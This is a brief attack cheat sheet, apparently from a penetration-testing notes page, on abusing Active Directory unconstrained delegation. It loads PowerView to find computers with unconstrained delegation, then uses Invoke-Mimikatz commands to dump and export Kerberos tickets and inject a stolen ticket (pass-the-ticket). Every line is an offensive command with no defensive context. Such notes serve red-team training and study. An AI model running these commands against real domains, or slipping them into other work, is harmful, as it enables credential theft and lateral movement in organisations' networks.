Unconstrained Delegation
. .\PowerView_dev.ps1
Get-Netcomputer -UnConstrained
Get-Netcomputer -UnConstrained | select samaccountnameInvoke-Mimikatz -Command '"sekurlsa::tickets"'Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'Last updated